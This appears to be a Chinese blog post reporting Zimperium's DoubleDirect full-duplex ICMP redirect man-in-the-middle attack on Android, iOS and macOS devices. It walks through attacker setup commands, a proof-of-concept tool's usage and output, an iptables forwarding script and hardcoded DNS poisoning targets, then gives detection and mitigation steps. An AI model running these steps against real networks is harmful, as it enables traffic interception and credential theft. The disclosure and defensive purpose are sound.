走近科学之剑指Android和iOS系统的DoubleDirect中间人

  • A+
所属分类:移动安全

安全研究员发现一种新型的中间人攻击技术,它的攻击目标主要是运行Android系统和iOS系统的智能手机和平板电脑。

这种被称为DoubleDirect的技术属于中间人(MITM)攻击的一种。攻击者可以利用这种技术把受害者访问谷歌、Facebook、Twitter上的流量重定向到攻击者控制的设备上,而一旦受害者的流量被重定向了,攻击者就可窃取受害者的私人数据,比如,邮箱ID、登录凭证、银行信息等,当然他还可以在受害者的机器上安装木马等恶意软件。

旧金山的一家移动安全公司Zimperium在其博客中详细介绍了这一威胁。黑客正在利用DoubleDirect技术进行针对性攻击,范围包括美国、英国、加拿大在内的31个国家,5大互联网巨头——Google,Facebook,Hotmail,Live.com和Twitter。

全双工的ICMP重定向中间人攻击

ICMP攻击是中间人攻击(MITM)的一种,传统的ICMP重定向攻击及其利用工具则类似于ettercap+半双工中间人攻击(MITM)。受害者因为ICMP重定向攻击被欺骗,路由器因为ARP欺骗攻击被毒化。这种ICMP攻击可以通过防御ARP攻击的传统手段相对轻松的防御住。

而DoubleDirect则有所不同,它通过ICMP(网间控制报文协议)重定向数据包改变主机路由表。ICMP重定向数据包会告诉主机有一个更好的路由路径可以达到目的地。改变受害者机器上的路由表可以使任意的网络流量流向特定的IP地址(比如攻击者的IP),然后攻击者就可以从中作梗发动中间人攻击了。在流量被重定向之后,攻击者可通过利用客户端漏洞攻击受害者的设备,从而访问受害者的网络。

通过研究DoubleDirect攻击,我们发现攻击者通过目前未知的技术,实现了全双工的ICMP重定向中间人攻击。而传统的ICMP重定向攻击是有半双工限制的。

DoubleDirect攻击是如何工作的?

Zimperium移动安全实验室在研究该攻击之后创建了一个攻击测试工具,它可以证明发动全双工ICMP重定向攻击是有可能的。ICMP重定向攻击的难点在于,攻击者必须预先知道受害者已经可到达的IP地址。

攻击者怎样知道受害者可达的IP地址呢?要回答这个问题我们应该先分析受害者的设备。

例如,当我们在浏览器中输入www.zimperium.com时,应用程序会发送一个DNS请求以找出www.zimperium.com主机的IP地址。

首先,我们会用ICMP重定向数据包把受害者设备上的所有DNS流量转发到我们的设备上。大多数时候我们都能预测到受害者使用的DNS服务器。

如果受害者与我们在同个局域网(LAN),那么受害者的DNS服务器也很有可能与我们通过DHCP(动态主机配置协议)所获得的DNS服务器相同。当然,有些移动设备使用的是默认的DNS服务器(8.8.8.8或者 8.8.4.4)。

我们还提供了一个简单有效的工具来研究DoubleDirect,单击这里即可下载。

如果想编译和运行这个工具,你需要在系统上安装libcrafter(https://code.google.com/p/libcrafter/)。libcrafter是一个C++开发的跨平台库,可以用来抓包和解包。在GNU/linux或者MACOSX系统上编译,你需要执行以下的命令:

$ git clone https://github.com/pellegre/libcrafter 
$ cd libcrafter/libcrafter 
$ ./autogen.sh 
$ make 
$ sudo make install 
$ sudo ldconfig

值得注意的是,在配置libcrafter之前你需要安装抓包工具libpcap:

#apt-get install libpcap-dev DoubleDirect实例:全双工ICMP重定向攻击

场景再现

网关=192.168.1.1

攻击机(Ubuntu)=192.168.1.105

受害机(GalaxyS4)=192.168.1.101

受害机配置

首先需要做的是,检查设备是否支持重定向。GalaxyS4会默认支持重定向:

# cat /proc/sys/net/ipv4/conf/all/accept_redirects 1

其次,如果你的设备不支持ICMP重定向但你又想测试这一攻击,那可以执行下面的命令:

# echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

攻击机配置

为了保证攻击的正确进行,我们需要在攻击者设备上执行一些命令:

对数据流量进行转发(该方式具有暂时性,重启便失效。要想长久保持转发需要修改/etc/sysctl.conf)

# echo 1 > /proc/sys/net/ipv4/ip_forward

关闭攻击机的重定向设置。这很重要!我们需要告诉告诉攻击设备的内核:不要发送重定向

# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirect

攻击演示

编译DoubleDirect_poc.cpp文件:

$ g++ doubledirect_poc.cpp -o doubledirect_poc -lcrafter
$ ./doubledirect_poc
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Usage: ./doubledirect_poc [options]

POC选项:
-i指定网络接口
-v受害机IP地址
-d毒化的目标IP

当受害者访问一些网址时,我们会毒化一个受害者机器可达的远程IP地址,而不是进行局域网ARP欺骗。然后我们就让受害者的流量发向我们的设备,而不通过真正的网关。

当设备发送了一个目的地为8.8.8.8的IP数据包时,它本该经过网关(192.168.1.1)……

我们在攻击者设备上执行:

$ sudo ./doubledirect_poc -i wlan0 -v 192.168.1.101 -d 8.8.8.8
[#] Attack parameters :
[+] Interface : wlan0
[+] Victim IP address : 192.168.1.101
[+] Destination to poison : 8.8.8.8
[#] Gateway parameters :
[+] Gateway IP address : 192.168.1.1
[+] Gateway MAC address : *:*:*:*:AE:51
[#] My parameters :
[+] My IP address : 192.168.1.105

从上面的演示可以看出,我们是怎样毒化8.8.8.8为我们的IP192.168.1.105的。当受害者发送目的地为8.8.8.8的数据包时,它会把我们的设备作为网关,这样一来我们就可以嗅探到流向目的地的所有流量了。

一旦所有的DNS流量都通过我们的电脑转发了,我们通过DNS回应包获得IP地址,并可以向这些IP地址发送ICMP重定向数据包。这样,我们不仅能嗅探到受害者的所有DNS流量,还可以完全的将其转发到我们的设备上。

测试你是否易受DoubleDirect的攻击,我们可以写一个bash脚本,利用iptables进行IP转发:

# cat iptables_dobule_direct.sh
#!/bin/sh
if [ $# -lt 1 ]; then
echo "[@] Usage: `basename ${0}` "
echo "[@] Example: `basename ${0}` wlan0"
exit 0
fi
INTERFACE=${1}
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat
iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE # ./iptables_double_direct.sh wlan0

最后执行ZimperiumDoubleDirect攻击测试工具:

# ./doubledirect_poc -i wlan0 -v 192.168.1.101
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Attack parameters :
[+] Interface : wlan0
[+] Victim IP address : 192.168.1.101
[#] Gateway parameters :
[+] Gateway IP address : 192.168.2.1
[+] Gateway MAC address : 00:1f:*:*:*:*
[#] My parameters :
[+] My IP address : 192.168.2.103

DNS服务器是被硬编进代码(397行,DoubleDirect_poc.cpp文件)里的。

// Hardcoded DNS servers we want to redirect to our machine
startIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // Gateway
startIcmpRedirectAttack(*redirect_parameters, "8.8.8.8");
startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4");
startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222"); 
startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220"); 应对策略

Android(安卓)、IOS、MacOSX设备通常默认支持ICMP重定向。

要想知道你的OSX设备是否易受DoubleDirect攻击,可以执行以下命令:

sysctl net.inet.ip.redirect | grep ": 1" && echo "DoubleDirect: VULNERABLE" || echo "DoubleDirect: SAFE"

要想使ICMP重定向在Mac失效可以执行以下命令(需要Root权限):

# sysctl -w net.inet.ip.redirect=0

注:这种修复不具有持久性,要想使其长久的有效,你可以重启之后在命令行中添加启动脚本。

对于Android来说,大部分的Android设备都会默认支持重定向,要想使其失效,需要root设备并且执行以下命令:

# echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects 哪些设备会受到攻击

受影响的系统包括

Android设备:大部分Android设备,包括Nexus 5 + Lollipop
iOS设备:最新iOS设备,包括iOS 8.1.1
Mac:Mac OS X Yosemite(优胜美地)

大部分Windows和GNU/Linux用户不会受到DoubleDirect的攻击,因为这些操作系统不支持ICMP重定向数据包。

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: